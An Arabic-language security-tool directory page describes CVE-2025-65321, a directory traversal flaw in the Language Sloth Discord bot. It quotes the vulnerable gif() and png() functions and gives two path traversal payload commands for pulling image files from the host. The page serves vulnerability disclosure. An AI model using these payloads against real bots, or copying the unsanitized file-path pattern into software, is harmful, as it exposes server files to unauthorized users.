Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65321 — Language Sloth Sloth Bot 1.0 معرض لـ Directory Traversal في الدالتين gif() و png(). تقوم الدوال ببناء مسارات الملفات باستخدام إدخال مستخدم غير معقم للمعامل 'name'، مما يسمح للمهاجمين بالإشارة إلى ملفات خارج أدلة الموارد المقصودة. | Kitploit
أدوات/GitHubGitHub/smarttfoxx/cve-2025-65321
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلومات
GitHubsmarttfoxx/cve-2025-65321

CVE-2025-65321

Language Sloth Sloth Bot 1.0 معرض لـ Directory Traversal في الدالتين gif() و png(). تقوم الدوال ببناء مسارات الملفات باستخدام إدخال مستخدم غير معقم للمعامل 'name'، مما يسمح للمهاجمين بالإشارة إلى ملفات خارج أدلة الموارد المقصودة.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-65321

بوت Discord الخاص بـ Language Sloth عرضة لثغرة اجتياز الدليل (Directory Traversal) في الدالتين gif() و png(). تقوم الدالتان ببناء مسارات الملفات باستخدام مدخلات المستخدم غير المنقاة للمعامل name، مما يسمح للمهاجمين بالإشارة إلى ملفات خارج أدلة الموارد المخصصة.

الدالتان gif و png في الملف files.py عرضتان لاجتياز الدليل لأنهما تستخدمان open لاسترداد ملفات محلية من الخادم الذي يستضيف البوت. تسمح الحمولات أدناه لأي مستخدم على Discord باسترداد ملفات .gif و .png مستضافة في أي مكان على الخادم الذي يستضيف البوت.

root@kitploit:~
async def gif(self, ctx, name: str = None):
        '''
        (ADM) Sends a gif from the bot's gif folder.
        :param name: The name of the gif file.
        '''
        await ctx.message.delete()
        try:
            with open(f'./gif/{name}.gif', 'rb') as pic:
                await ctx.send(file=discord.File(pic))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")
root@kitploit:~
async def png(self, ctx, name: str = None):
        '''
        (ADM) Sends a png from the bot's png folder.
        :param name: The name of the png file.
        '''
        await ctx.message.delete()
        try:
            await ctx.send(file=discord.File(f'./png/{name}.png'))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")

يتم إدراج المعامل name مباشرة في مسار الملف دون تحقق أو تنقية:

root@kitploit:~
f'./gif/{name}.gif'
f'./png/{name}.png'

أمثلة على الحمولات:

root@kitploit:~
z!gif ..\..\..\..\Windows\filename
root@kitploit:~
z!png ..\..\..\..\Windows\filename
صورة

توضح الصورة أعلاه استخراج صورة موجودة في C:\Windows\cat.gif.

تنزيل الأداة